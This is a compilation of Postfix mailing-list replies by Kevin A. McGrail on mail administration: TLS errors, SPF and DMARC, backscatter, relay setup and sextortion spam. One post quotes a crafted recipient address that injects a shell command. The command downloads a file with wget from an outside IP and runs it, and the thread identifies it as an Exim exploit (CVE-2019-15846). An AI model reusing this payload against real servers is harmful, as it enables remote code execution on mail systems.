Re: [External] Re: Outlook TLS errors after Microsoft Windows Update

[Kevin A. McGrail]

On 10/26/2022 10:56 AM, Viktor Dukhovni wrote:

RAPTOR REMARK: Alert! Please be careful! This email is from an EXTERNAL sender. 
Be aware of impersonation and credential theft.

On Wed, Oct 26, 2022 at 03:56:29PM +0200, Gerald Galster wrote:


This issue is resolved by update KB5018496 for Windows 11 22H2 x64:

https://support.microsoft.com/en-us/topic/october-25-2022-kb5018496-os-build-22621-755-preview-64040bea-1e02-4b6d-bad1-b036200c2cb3

October 25, 2022—KB5018496 (OS Build 22621.755) Preview
[...]
It addresses an issue that might affect some types of Secure Sockets
Layer (SSL) and Transport Layer Security (TLS) connections. These
connections might have handshake failures. For developers, the
affected connections are likely to send multiple frames followed by a
partial frame with a size of less than 5 bytes within a single input
buffer. If the connection fails, your app will receive the error,
“SEC_E_ILLEGAL_MESSAGE”.

There were perhaps additional resolved issues that were not mentioned,
since the PCAP files show no such packets.  However, if the immediate
issue is no longer reproducible, I guess that's progress.



I wanted to mention that the update also broke some of the older Adobe 
products we had in use because the DRM comms channels used TLS 1.0 and I 
believe it disabled everything by TLS 1.2 in Edge by default.


Not necessarily saying Microsoft's choice was bad but it points out 
Adobe's poor infrastructure for their DRM.


Regards,

KAM

Re: [External] What does AW mean - was - Re: AW: RSA and ECDSA - warning: No certs for key at index 1

[Kevin A. McGrail]

On 5/31/2022 10:18 AM, Bret Busby wrote:
I keep seeing "AW" prepended to message subjects and I have no idea of 
what it means.


What does it mean?

I believe it's the German equivalent for re: 
(https://en.wikipedia.org/wiki/List_of_email_subject_abbreviations) as 
in Regarding.


Regards,
KAM

Re: [External] Re: Why the name Postfix?

[Kevin A. McGrail]

Great Idea!  Done

On 3/27/2022 6:08 PM, lists wrote:

Perhaps someone who knows how to update wiki can add this information.

https://en.wikipedia.org/wiki/Postfix_(software)

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

[Kevin A. McGrail]

On 10/11/2021 6:28 PM, Carl Brewer wrote:

http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
 for more information. 


Carl, I noticed this and wanted to mention if you are using something 
like Google's quad8 for your resolver?  If so, install a caching 
local nameserver.


No, I have my own bind running on my LAN.


Rhetorical question but what's your volume like because you are hitting 
some blocks for volume according to that.


Regards,

KAM

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

[Kevin A. McGrail]

On 10/11/2021 5:32 PM, Carl Brewer wrote:

 0.0 URIBL_BLOCKED  ADMINISTRATOR NOTICE: The query to URIBL was
    blocked.  See

http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
 for more information. 


Carl, I noticed this and wanted to mention if you are using something 
like Google's quad8 for your resolver?  If so, install a caching local 
nameserver.


You might also consider adding the KAM channel to your rules. Over 17 
years of publishing them for the world for free now: 
https://mcgrail.com/template/kam.cf_channel


Regards,

KAM

Re: [External] Postfix and Mimedefang for single user?

[Kevin A. McGrail]

Hi LuKreme,

I believe once you hook in MIMEDefang with postfix, it's a general 
purpose filter that uses the milter interface to process emails at 
various stages of the mail dialogue and processing.  It hurts my brain 
to think about whether Postfix could do a filter on the recipients and 
then hand-off things to MIMEDefang or not :-)


If you take a look at 
https://mcgrail.com/downloads/The%20Perl%20Conference%202019%20-%20%20Fighting%20Spam%20with%20Perl%20using%20Apache%20SpamAssassin%20&%20MIMEDefang%20.pdf 
you can get a demo filter at 
https://drive.google.com/file/d/1yu6cnEN_22A07_9ApvBxrvLs4iiAeeW1/view 
which helps you see the hooks available.


You could add a function in filter_recipient to set a global variable 
that you don't want to do any processing unless a specific recipient is 
involved.  Then you could add logic elsewhere to use that variable.


Regards,

KAM

On 3/27/2021 12:49 PM, @lbutlr wrote:

I would like postfix to send mail being delivered to a specific virtual user 
user on to mimedefang, but the instructions that I see on setting up mimedefang 
are just to set it up as a general milter.

Or do I need to configure mime defang itself to only process the mail to that 
user?

Also, right now it is setup with

-s /var/spool/MIMEDefang/mimedefang-multiplexor.sock

Does it need to be a port instead?

(Most the stuff I can find is a about decade old and the rest is even older, so 
I have little confidence)

Re: [External] Re: Deprecated: white is better than black

[Kevin A. McGrail]

If it helps with others, the SA project uses WelcomeList and BlockList 
so you don't have to change acronyms like RBL.  Some slides from a talk 
at 
https://mcgrail.com/downloads/DevFest%202020%20-%20Removing%20Racially%20Charged%20Language%20from%20Technology%20Speaker%20Presentation%20GDG%20Devfest%20UK%20&%20Ireland%202020%20-%20KAM%20FINAL.pdf 
might be interesting too.


On 2/24/2021 12:37 PM, Curtis Maurand wrote:

I totally agree with this and I am going to work to scrub the prior terminology 
from my system.

Thank you, Wietse

—Curtis

Sent from my iPhone


On Feb 24, 2021, at 12:12 PM, Wietse Venema  wrote:

The following is from the postfix-3.6-20210221 release notes.

Wietse

Postfix version 3.6 deprecates terminology that implies white is
better than black. Instead, Postfix prefers 'allowlist', 'denylist',
and variations on those words.

Noel Jones assisted with the initial transition.

Changes in documentation


Documentation was updated to use 'allowlist', 'denylist', etc.
These documentation changes do not affect Postfix behavior.

Changes in parameter names
--

The following parameters replace names that contain 'blacklist' or
'whitelist':

postscreen_allowlist_interfaces
postscreen_denylist_action
postscreen_dnsbl_allowlist_threshold

These new parameters have backwards-compatible default settings
that support the old parameter names, so that the name change should
not affect Postfix behavior. This means that existing management tools
that use the old parameter names should keep working as before.

This compatibility safety net may break when some management tools
use the new parameter names, and some use the old names, such that
different tools will disagree on how Postfix works.

Changes in logging
--

The following logging replaces forms that contain 'blacklist' or
'whitelist':

postfix/postscreen[pid]: ALLOWLIST VETO [address]:port
postfix/postscreen[pid]: ALLOWLISTED [address]:port
postfix/postscreen[pid]: DENYLISTED [address]:port

To avoid breaking logfile analysis tools, Postfix keeps logging the old
forms by default, as long as the compatibility_level parameter setting
is less than 3.6, and the respectful_logging parameter is not explicitly
configured. As a reminder, Postfix will log the following:

postfix/postscreen[pid]: Using backwards-compatible default setting
respectful_logging=no for client [address]:port

To keep logging the old form, make the setting "respectful_logging =
no" permanent in main.cf, for example:

# postconf "respectful_logging = no"
# postfix reload

To stop the reminder, configure the respectful_logging parameter to
"yes" or "no", or configure "compatibility_level = 3.6".

--




*Kevin A. McGrail*
/CEO Emeritus/
*Peregrine Computer Consultants Corporation*
+1.703.798.0171 kmcgr...@pccc.com
 https://pccc.com/  https://raptoremailsecurity.com

10311 Cascade Lane, Fairfax, Virginia 22032-2357 USA

Re: [External] SPAM attack from bounce techniques

[Kevin A. McGrail]

On 12/29/2020 7:37 AM, Rafael Azevedo wrote:

Hi there,

I've noticed that one of our servers is receiving a huge amount of 
unauthorized requests.


User connects to our server and tries to send an email to any 
destination. Our servers denies the message because user is not 
authenticated. Then, a bounce is generated to the source address, 
which was fake and turns to be the final destination, so at the end, 
the email is actually sent as a bounce, proliferating lots of spam.


Is there a way to avoid this?


Hi Rafael, This sounds like backscatter.  To avoid it, you need to 
reject the email during the real-time SMTP dialog with the sender, i.e. 
during the connection from the sender, if it's an invalid recipient, 
reject with 5xx.  This will cause you to tell the sending server and you 
don't generate a bounce.


The question is: Why are you accepting the email, then determining it's 
invalid, and creating a bounce?  I would typically look at some sort of 
architecture issue where you haven't done what we call promoted the 
valid users to the edge of your internet connection.


Hope this helps and share more information for more guidance.


Regards,
KAM

Re: [External] Re: postfix and MX

[Kevin A. McGrail]

On 9/17/2020 9:20 PM, Antonio Leding wrote:
>
> I stopped believing long ago that Microsoft adhered to any standard in
> earnest.  To me, they always seemed to be more about
> implanting new standards that the world would then follow…
In fairness, Microsoft's embrace/extend/extinguish plans are well known
but I also think a thing of the past.  I've been pretty impressed by
their netizenship in the past decade.  Not saying it didn't take the US
DoJ for a wake-up call but really impressed with what I've seen.  Is
there a specific and recent example you can think of?

Regards,
KAM

Re: [External] spam uses my email address as sender in "header from"

[Kevin A. McGrail]

On 9/14/2020 6:35 AM, Fourhundred Thecat wrote:
> Can I reject messages that have different envelope from and header from?
>
> Or what would be the best approach ? 


Are you publishing an SPF record?  Are you using DKIM?  Are you
publishing a DMARC policy (even one with policies of none)?  Are you
using Apache SpamAssassin?

Regards,
KAM

Re: [External] Re: The historical roots of our computer terms

[Kevin A. McGrail]

On 6/8/2020 9:54 AM, vi...@vheuser.com wrote:
>
> On 2020/06/08 09:31 AM, Kevin A. McGrail wrote:
>> On 6/8/2020 9:06 AM, John Dale wrote:
>>> Why does this agitate people?  Because if the time spend on this
>>> change had been used to fix an actual deficiency, people of color who
>>> use the software would have been served with value, not just
>>> platitudes.
>> Sounds like a lot of pontificating.  Can you back up this stance with
>> your CV related to open source software, please?
>>
>> Are you a committer, contributer, supporter, sponsor or member of any
>> OSS project or OSS organization?
>>
> Perfect.
> The ad hominem argument fits in perfectly with the rest of this drivel.
>   The unrestrained snowflakes seeking to harass everyone else off the
> list.
>     Can we get back to work or do we all have to unsubscribe because
> of an abusive few? 

I question why you think you have a seat at the table on the
decision-making process for how these open source software's operate? 
For example, at the ASF, we are not a democracy but a meritocracy. 

So I am not attacking you but yes, I am questioning your merit to speak
on the matter.  Lots of people have ideas and thoughts.  Very few people
take action like Wietse and do the work.  So to me, your opinion on the
change compared with Wietse's opinion are not equal.  You may look at
this as an ad hominem.  I look at it as establishing whether you are or
are not a subject matter expect in the field of OSS and giving you the
opportunity to establish why your opinion should be taken seriously.

Regards,

KAM

Re: [External] Re: The historical roots of our computer terms

[Kevin A. McGrail]

On 6/8/2020 9:06 AM, John Dale wrote:
> Why does this agitate people?  Because if the time spend on this
> change had been used to fix an actual deficiency, people of color who
> use the software would have been served with value, not just platitudes. 
Sounds like a lot of pontificating.  Can you back up this stance with
your CV related to open source software, please? 

Are you a committer, contributer, supporter, sponsor or member of any
OSS project or OSS organization?

Regards,
KAM

Re: [External] Re: The historical roots of our computer terms

[Kevin A. McGrail]

On 6/8/2020 8:37 AM, Phil Stracchino wrote:
> The color is widely and somewhat sardonically known as 'bleen' or 'grue'.
See, that's just wrong. We all know what a Grue is...
Regards,
KAM
https://zork.fandom.com/wiki/Grue

Re: [External] Re: The historical roots of our computer terms

[Kevin A. McGrail]

On 6/6/2020 11:00 AM, Ian Evans wrote:
>
>
> On Sat, Jun 6, 2020, 10:28 AM Kevin A. McGrail,  <mailto:kmcgr...@pccc.com>> wrote:
>
> Thanks for the reminder on this.  The Apache SpamAssassin project
> voted to do this change on May 3rd and I'm taking the baton to
> bring it to fruition.
>
>
>
> Kevin, that's interesting that SpamAssassin had already voted on this
> back in May. As Larry just illustrated, some will view Leah Culver's
> software industry proposal as an example of political correctness.
> Others will argue the etymology is based on light and dark and
> religion and not race. As I said, her post was food for thought.
> Whether people want to ponder the menu is up to the programmers for now.

Our project didn't disagree it's political correctness we just don't
feel there is any problem with being correct.  Leah's note was not the
impetus for this, it was this article on April 5th that I brought to the
attention of our project management committee. 
https://www.zdnet.com/article/uk-ncsc-to-stop-using-whitelist-and-blacklist-due-to-racial-stereotyping/
<https://www.zdnet.com/article/uk-ncsc-to-stop-using-whitelist-and-blacklist-due-to-racial-stereotyping/>

After discussion for a month, a vote was called and passed with all
+1's.  My only regret is that I didn't think to do this some 20 years ago.

Regards,

KAM

Re: [External] Re: The historical roots of our computer terms

[Kevin A. McGrail]

Thanks for the reminder on this.  The Apache SpamAssassin project voted
to do this change on May 3rd and I'm taking the baton to bring it to
fruition.

Regards,
KAM

On 6/6/2020 10:20 AM, Wietse Venema wrote:
> Ian Evans:
>> Food for thought from the co-author of OAuth and oEmbed. How easy would it
>> be for Postfix/Postscreen configs/docs to, say, refer to allow/deny lists?
> Easily, if they can be acessed via DNSBL/DNSWL qeueries. Any 'new'
> lookup mechanism will have to be added through a postscreen policy
> plugin, and that involves new Postfix code.
>
> For context: Postscreen decides if a remote SMTP client is allowed
> to talk to a Postfix SMTP service. The decision is made on (protocol)
> behavior and reputation, plus a static allow/deny list that is
> typically populated with information from major provider SPF records.
>
>   Wietse
>
>> Leah Culver (@leahculver) tweeted at 11:32 PM on Fri, Jun 05, 2020:
>> I refuse to use ?whitelist?/?blacklist? or ?master?/?slave? terminology for
>> computers. Join me. Words matter.
>> (https://twitter.com/leahculver/status/1269109776983547904?s=03)
-- 
*Kevin A. McGrail*
CEO Emeritus

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

https://www.linkedin.com/in/kmcgrail

OFF-TOPIC: Re: [External] Re: why DMARC PASS even SPF got failed

[Kevin A. McGrail]

> Scott, I have another question.

Gents, I love geeking about email and spam techniques but these are not
postfix related nor do they relate to beer*.  IMO these should be
discussed elsewhere.

Regards,

KAM

* There are some mailing lists with exclusions that discussions on beer
are always on-topic.

Re: [External] command injection by crafted recipient address

[Kevin A. McGrail]

On 3/12/2020 4:40 PM, kris_h wrote:
> root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost

It's an exim exploit.  See CVE-2019-15846.

Regards,

KAM

Re: [External] Re: SPF IP addresses limit question

[Kevin A. McGrail]

On 2/23/2020 11:30 PM, Mohamed Lrhazi wrote:
>
> My question still was: Suppose I comply with all the
> recommendations and best practices in composing my SPF records... Do I
> still need to worry about the number of IP addresses (v4/v6/ciders)
> that I put in each record?

Yes. In the anti-spam world, we analyze SPF records for indicators that
they are overly broad and non-specific as an indicator of a lack of
postmaster hygiene.  And if your SPF is poorly done and others can spoof
your domain by having adjacent IPs, that's bad too!  Make your SPF
record as accurate and minimal as you can for the best results.

Regards,

KAM

Re: [External] Re: SPF IP addresses limit question

[Kevin A. McGrail]

On 2/23/2020 7:08 PM, Scott Kitterman wrote:
> The limits are a function of DNS, not SPF, which is why RFC 7208 Section 3.4.
>  was written.

I would there is also a somewhat arbitrary limit that was picked that
doesn't t match the real world.  See
https://bz.apache.org/SpamAssassin/show_bug.cgi?id=7182 for why we
raised from 10 to 15 to 20 lookups on the Apache SpamAssassin project.

Regards,

KAM

Re: [External] Block email based on reply field

[Kevin A. McGrail]

If you have integrated with Apache SpamAssassin, then v3.4.3 introduces
the ability to do RBL lookups on the domain in Reply-to as well as the
ability to do hashed lookups.

Regards,
KAM

On 12/11/2019 9:38 PM, li...@lazygranch.com wrote:
> I have a spammer who uses all sorts of "from" addresses but the same
> "reply" address. Any way to block this spammer in Postfix. 

Re: block 'new style' TLDs ?

[Kevin A. McGrail]

On 11/2/2019 2:38 PM, John Schmerold wrote:
> On 10/24/2019 12:32 AM, @lbutlr wrote:
>> On 23 Oct 2019, at 15:20, lists  wrote:
>>> /\.asia$/ 510 Denied: Unacceptable TLD .asia
>> [Long list… removed]
>>
>> smtpd_helo_restrictions = reject_invalid_helo_hostname
>>  check_helo_access pcre:/etc/postfix/helo_checks.pcre permit
>>
>> /etc/postfix/helo_checks.pcre:
>> /.*\.(com|net|org|edu|gov|ca|mx|de|dk|fi|fr|uk|us|tv|info|biz|eu|es|il|it|nl|name|jp|host|au|nz|ch|tv)$/
>> DUNNO
>> /.*\.*$/ 550 Mail to or from this TLD is not allowed
>>
>>
>> Of course your list will differ than mine, but I find this much
>> better than reacting to which of these new garbage TLDs are spamming
>> me this week.
>
> You can achieve a similar result with this addition to SA's custom.cf:
>
> header GC_TLD_COM_R Received !~/\.(?:com|net|org|edu|uk|us|gov)\b/i
> score GC_TLD_COM_R 3.2
>
> header GC_TLD_COM_F From !~/\.(?:com|net|org|edu|uk|us|ca|gov)\b/i
> score GC_TLD_COM_F 3.2
>
> If I were a bit more worldly, I would add a few more country codes.
>

Just some additions to John's ideas:

If you search TLD in KAM.cf (http://www.mcgrail.com/downloads/KAM.cf),
you'll see some examples of how to do this.

There is also a new feature for WLBLEval plugin (see
https://bz.apache.org/SpamAssassin/show_bug.cgi?id=7354) which is in
trunk and in the release candidate for 3.4.3. 

That lets you do something like:

enlist_addrlist (SUSPECTTLDS) *@*.politicians
enlist_addrlist (SUSPECTTLDS) *@*.spammer

header __FROM_SUSPECT_TLD eval:check_from_in_list('SUSPECTTLDS')

Take a look.  We can also use help testing the release candidate[1].


Regards,

KAM


[1]

3.4.3 release candidate 5 is now available at 
http://talon2.pccc.com/~kmcgrail/devel/

sha256sum of archive files:

  0004e17011f8d050e621dce7990bfd31fbdf50a7c54c68829f0553c6759d11f9  
Mail-SpamAssassin-3.4.3-rc5.tar.bz2
  b7f12b3e2ff740e9746ad0bc1446807e1972309689ced6e3de0c24facf3db77f  
Mail-SpamAssassin-3.4.3-rc5.tar.gz
  751aa714c923e2464c4c8a1ae624dbd9355c38f59bd8cbdc7949bc4f29449aa1  
Mail-SpamAssassin-3.4.3-rc5.zip
  41edfd71101a48c7f3c404f481595b9613c95ce25e25abeb9ced0e45d7539f84  
Mail-SpamAssassin-rules-3.4.3-rc5.r1868741.tgz

sha512sum of archive files:

  
ac1e51f814040af9397fb73de4c0da7daf3327a543b7e5082c63cd19166dc530c725490bcdf65e8c1472df4d2d3fdfbb84779a23a98281313ec2b457c7fcb190
  Mail-SpamAssassin-3.4.3-rc5.tar.bz2
  
51518571eec7691987065c66aaec882b5deabac37124011f8da26cbd040cb223e37b3d0d4a4d962ff848fe4639a101046ffc21d4694df035acb8eb330b24e614
  Mail-SpamAssassin-3.4.3-rc5.tar.gz
  
65b783d037ebe8a99466e15c0409c51ed3fa12d046139232ba90d6ccb63614008e2c54138a01f8afe67f38c163e5bf2955d2c8fd2bf2397b83d09a4b0a6534e7
  Mail-SpamAssassin-3.4.3-rc5.zip
  
ed1565c8f4448319546808fc2a2326f380153699631089c183ee93aa962fded59414643b2345ecdfabf9098d40609dd121b1056feabd162d830ea527ec2c3b04
  Mail-SpamAssassin-rules-3.4.3-rc5.r1868741.tgz



-- 
*Kevin A. McGrail*
CEO Emeritus

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

https://www.linkedin.com/in/kmcgrail

Re: Refuse mail from hosts with closed port 25

[Kevin A. McGrail]

On 9/16/2019 11:00 AM, Benny Pedersen wrote:
> Kevin A. McGrail skrev den 2019-09-16 16:19:
>> Fair enough.  Maybe he should turn that feature on then :-)
>
> if you do you cant recieve email from me
>
> validMX is strict to say domains without MX is invalid domain ?
>
> oh and MX failback is not a rfc ?
>
> be carefull testing with "sendmail -bv u...@example.org" and check how
> badly sendmail do it
Benny, you and I correspond and I use the netValidMX.  Not sure what you
are trying to say.

Re: Refuse mail from hosts with closed port 25

[Kevin A. McGrail]

Fair enough.  Maybe he should turn that feature on then :-)

On 9/16/2019 9:59 AM, Bill Cole wrote:
>
> I don't believe that Net::validMX does anything more *at the domain
> level* than Postfix's built-in reject_unknown_sender_domain
> restriction. Its check_email_validity() may be a bit more strict than
> Postfix's built-in address sanity checks. 
-- 
*Kevin A. McGrail*
CEO Emeritus

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

https://www.linkedin.com/in/kmcgrail

Re: Refuse mail from hosts with closed port 25

[Kevin A. McGrail]

On 9/16/2019 9:03 AM, Jim Reid wrote:
> On 16 Sep 2019, at 13:47, Paul van der Vlis  wrote:
>
> How can I refuse mail from hosts who don't have an open port 25?
Paul, I wrote a module which I need to update on Perl's CPAN called
Net::validMX that we use to reject IPv4 domains that aren't properly
setup to receive mail from sending to us.  We've used it in production
with MIMEDefang.  And as a small, boutique ESP for over a decade, likely
closer to 15 years with no complaints/FPs of note.
Regards,
KAM

OFF-TOPIC - Re: Adding DKIM and DMARC

[Kevin A. McGrail]

On 8/25/2019 11:49 AM, @lbutlr wrote:
> When adding DMARC and DKIM do I only need to add it to the domain that is 
> hosting the mail server (MX)?
>
> For example, if mail.example.com is defined as the MX for example.com and 
> example.net, do I need to add the DMARC/DKIM records to example.net’s DNS as 
> well?
DKIM and DMARC are records for a domain.  They don't care about MX records.

Example.com and example.net both need records.

Regards,
KAM

Re: ODMR/ATRN ?

[Kevin A. McGrail]

On 6/9/2019 6:18 PM, Ronald F. Guilmette wrote:
> Thank you, but I need to be frank. 

I thought you were Ronald?  :-)

> I believe that I understand fully how to handle my outbound email traffic,
> i.e. treating my (soon to be) cloud VM running Postfix as a "smarthost"
> for outbound.  That part is the easy part, and also the simple part.
>
> The harder part is handing the inbound email traffic for my several domains.
>
> I *think* that I *may* perhaps understand your suggestion with regards to
> that, but I'll have to think about it awhile longer before I can be sure.
>
> I wish that I had an example to look at, or some slightly-more-detailed
> write-up to refer to that would show me how to configure this exact approach
> with Postfix.
>
> But if worse comes to worse, I can probably puzzle it all out, starting from
> just what you said, above.
>
> One part that I'm sure that I -do not- understand is why you suggeted an
> alternative port number.  Can you explain? 

Almost every residential ISP will block ports like 25 and 80 so you
can't run servers on the connections.  You have a static IP and usually
that means they don't block ports.  When you switch away from that
solution, I expect you will see that change.

So you have a domain, tristatelogic.com.

- You get a VM on AWS w/CentOS. 
- You put an Elastic IP on it so it is static. 
- You create a security group that allows 25 and 22 from /0 inbound to
the box
- You create an A record called mail.tristatelogic.com pointed to the IP
- You open a ticket with AWS for the reverse pointer for the box and to
remove smtp throttling
- You mail.tristatelogic.com to accept relay mail for the domain
tristatelogic.com. 
- Setup SMTP Auth so that someone has to authenticate to send email outbound
- Setup a transport to deliver mail for tristatelogic.com to
local.tristatelogic.com on port 2525

At your home:

- Setup your postfix server so it works like you want called something
like local.tristatelogic.com
- Configure/Purchase a Dynamic DNS service so that something like
ronald.dyndns.something is a CNAME for local.tristatelogic.com so that
your mail works when your ISP changes your IP
- On the firewall at your house, port forward an alternate port such as
2525 to 25 on the postfix server on a static internal IP behind your
firewall
- Setup postfix on local.tristatelogic.com to smarthost with SMTP auth
through mail.tristatelogic.com

Also recommend on both local and mail boxes, you install Let's Encrypt
certs so you can require TLS for all the mail going between
mail.tristatelogic.com and local.tristatelogic.com.  You'll also get
opportunistic TLS for places that support it.

This will let you have inbound and outbound mail working from a server
on a residential grade connection.

As a homework exercise for the reader will be picking better names for
the boxes.  I suggest disney characters, firefly | star (trek|wars)
canon or dilbert characters.  ratbert and dilbert would get at least a
B+ from me.

Regards,

KAM

Re: ODMR/ATRN ?

[Kevin A. McGrail]

Well, first, my firm's commercial Raptor anti-pam solution supports
smarthosting for outbound and inbound on an alternate port.  Add any
dynamic DNS solution and you are good to go.  Plus you get the best
business anti-spam solution.  Happy to chat more about pricing. 

But that leads to my answer.  You can just setup a box on a VM with a
static IP and do smtp authentication for smarthosting through that box
and use it as a relay for your domain on an alternate port using Dynamic
DNS.  No need for fetchmail or anything like that.

Regards,
KAM



On 6/9/2019 4:42 PM, Ronald F. Guilmette wrote:
> I'd very much like to move my (Postfix) mail server, which currently resides
> on a (static IP) end-luser broadband line, to some VM in the cloud someplace,
> and then use something like fetchmail to poll that periodically to pull
> down all mail for my several domains and then have fetchmail re-inject
> all of those mail messages into the local Postfix.  The plan would be to
> get all this running and then give up my local static IP here, exchanging
> it for a dynamic one instead.  (This will save me a tiny bit of money on
> my monthy local ISP bill.)
>
> Googling for options just now, it sure sounds like ODMR/ATRN would fit
> my needs nicely, however I can't quite make out whether any of this
> ODMR/ATRN stuff has ever actually been implemented in Postfix or not.
> Has it been?
>
> Regardless of whether it has or not, if anyone wants to suggest or recommend
> any alternative solution(s) I'm all ears.  I am open to anything that
> will get the job done.  My only real requirements for a solution are:
>
> 1)  Must support unlimited email addresses per each recipient domain.
>
> 2)  Must preserve envelope sender information.
>
> In general, speed is not an issue, but security most certainly is.
>
> That having been said, I am not eager to use Jakob Hirsh's odmrd because
> that SMTP server is written in Perl, and I've been known to be DDoS'd
> from time to time.  So I'm loath to leave anything written in Perl running
> on any outward facing port.  It's just way too easy for an attacker to
> run the CPU usage up to 100% and keep it there if one does so.
>
> Looking forward to info on Postfix support for ODMR or alternatives thereto.
>
>
> Regards,
> rfg


-- 
*Kevin A. McGrail*
CEO Emeritus

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

https://www.linkedin.com/in/kmcgrail

Re: spam from own email address

[Kevin A. McGrail]

On 4/23/2019 12:20 PM, Benny Pedersen wrote:
> // maintainer hat on
>
> why are this rules not added to spamasassin core :(
>
Because masscheck and rule qa takes too long for the purposes we need
the rules for.

> \\ maintainer hat off
>
> or atleast a real spamassassin channel repo 

Time/money/energy for a solution that doesn't benefit our firm which has
provided the rules at no charge to the world for ~15 years.

We are always looking for sponsors to help with the work though.

Regards,

KAM

Re: spam from own email address

[Kevin A. McGrail]

On 4/23/2019 10:02 AM, Ian Jones wrote:
> I am getting emails like the one below, in which the header from is my
> own address. 

Ian, are you using Apache SpamAssassin or something in the mix?  I've
published a lot of rules for these sexploitation scams in KAM.cf and
with an SPF record, you really shouldn't get these in your inbox.


Regards,

KAM

OFF-TOPIC: KAM.cf to Core SA was Re: pishing from ME

[Kevin A. McGrail]

On 3/22/2019 10:45 PM, Benny Pedersen wrote:
> Kevin A. McGrail skrev den 2019-03-23 00:34:
>
>> Also see KAM.cf and the KAM_CRIM ruleset for spamassassin for this
>> exact run of spams.
>
> will you add good rules to core spamassassin ?
>
> so above is testing rules, not yet ready for core, if its stable just
> not in core i can see why thay could not be :(

No, sorry.  The core ruleset does not align with my needs specifically
in that the corpora and mass checkers at SA make additions too slow to
promote as well as too unlikely to get promoted for our needs.  We've
provided the file for free since at least 2004 and believe it is good rules.

One bit of good news is that we moved KAM.cf to The McGrail Foundation
which is a 501(c)(3) with a mission to provide services, education and
advocacy for private, secure and unimpeded business and
communications.   It's still ASLv2 licensed but we are looking for
sponsors to help fund it's development and as a 501(c)(3), all donations
are tax deductible to the extent permissible by law.

In particular, I'd like to move it to a channel with good mirrors. 
There are also discussions about how to speed up masscheck and publish
multiple rulesets per day. 

Regards,

KAM

Re: pishing from ME

[Kevin A. McGrail]

On 3/22/2019 9:31 PM, Viktor Dukhovni wrote:
>> Have you checked on haveibeenpwned for the email addresses and domains
>> in question?
> There's no need.  The team mailboxes in question are not associated
> with any login accounts, they're just public contact addresses
> scraped from websites.

You might be aware of this compromise but others might not: "Email
list-cleaning site may have leaked up to 2 billion records"

https://nakedsecurity.sophos.com/2019/03/12/researchers-disagree-on-volume-of-exposed-verificationsio-records/

Regards,

KAM

Re: pishing from ME

[Kevin A. McGrail]

On 3/22/2019 9:06 PM, Viktor Dukhovni wrote:
> Sure they may also be scraping email addresses from breaches, but
> that's one source.  These scams are not a specific indication that
> one's passwords are at risk.  That's true or false with or without
> receipt of these scams.

Have you checked on haveibeenpwned for the email addresses and domains
in question?

I do not disagree that the scammers are likely throwing everything they
can into their engine to send out the scams whether that's just a
scraped email or more compromised PII. 

So if you see one that has a password and it's legit, don't jump to OMG,
I've been hacked by this guy.  Look at haveibeenpwned and similar
sources to see, was I pwned through someone else's compromise and do I
need a better unique password regiment?

In general, for lay people, I tell them to use unique passphrases and
they don't stress when they see this BS as much.


Regards,

KAM

Re: pishing from ME

[Kevin A. McGrail]

On 3/22/2019 7:55 PM, Viktor Dukhovni wrote:
> No.  The scareware alerts are generally completely fake.  They
> are spammed indiscriminately to users the scammer knows nothing
> about.

Viktor, that does not agree with my significant experience studying this
particular spam threat.  Yes, they are "fake" alerts in that they
haven't hacked your PC but they do in fact have some information that
they are extrapolating to scare people. 

What I see with many of the samples is that they are using passwords
gained from massive attacks where passwords were leaked.  These hacks
have lead to user/email/password data easily available for gazillions of
people on the darkweb.  Haveibeenpwned.com can give you insight into
this. I recommend you take a look. 

This is step #1, obtaining some real passwords and email addresses.

Step #2 is they take this data and use the real passwords to email
people.  It's gives the scam a high psychological impact to trick
targets into paying.  People read and go "OMG, that is my password, I
have been hacked" because they don't have unique passwords.  Using this
technique, they separate logic from emotion and get people to pay the
ransom.  That's an important thing in the execution of many cons.

I'm giving a presentation for HIMSS on Mar 28 that we'll cover some of
these bad actor techniques and how to combat them.  It's free and I'd
welcome your feedback and anyone else who would like to join. HIMSS is a
great organization and I think even experts like you and those on this
list will learn some things.  Here's the information to register and attend:

Topic: Bad Actors and the Security Risks of Social Media Date and Time:
Thursday, March 28, 2019 2:00 pm, Eastern Daylight Time (New York,
GMT-04:00) Event number: 927 552 095 Event password: DG#$&uJET1743 Event
address for attendees:
https://himss.webex.com/himss/onstage/g.php?MTID=e4a485adfd01c461169172190512e0fe9
<https://www.google.com/url?q=https%3A%2F%2Fhimss.webex.com%2Fhimss%2Fonstage%2Fg.php%3FMTID%3De4a485adfd01c461169172190512e0fe9&sa=D&ust=1553730640914000&usg=AFQjCNFd0Jzu7EB54S577WcKLM341au0nw>Program:
HIMSS: Healthcare Cybersecurity Community Program address:
https://himss.webex.com/himss/onstage/g.php?PRID=dbe3a254261c448fe25995d7d9d2e2bf
<https://www.google.com/url?q=https%3A%2F%2Fhimss.webex.com%2Fhimss%2Fonstage%2Fg.php%3FPRID%3Ddbe3a254261c448fe25995d7d9d2e2bf&sa=D&ust=1553730640914000&usg=AFQjCNE5Cagh3_SMDcxS1rOrqLPca-Gg6g>Program
registration password: The program has no registration password
--- Audio conference
information --- To
receive a call back, provide your phone number when you join the event,
or call the number below and enter the access code. Call-in toll-free
number (US/Canada): 1-866-469-3239 Call-in toll number (US/Canada):
1-650-429-3300 Global call-in numbers:
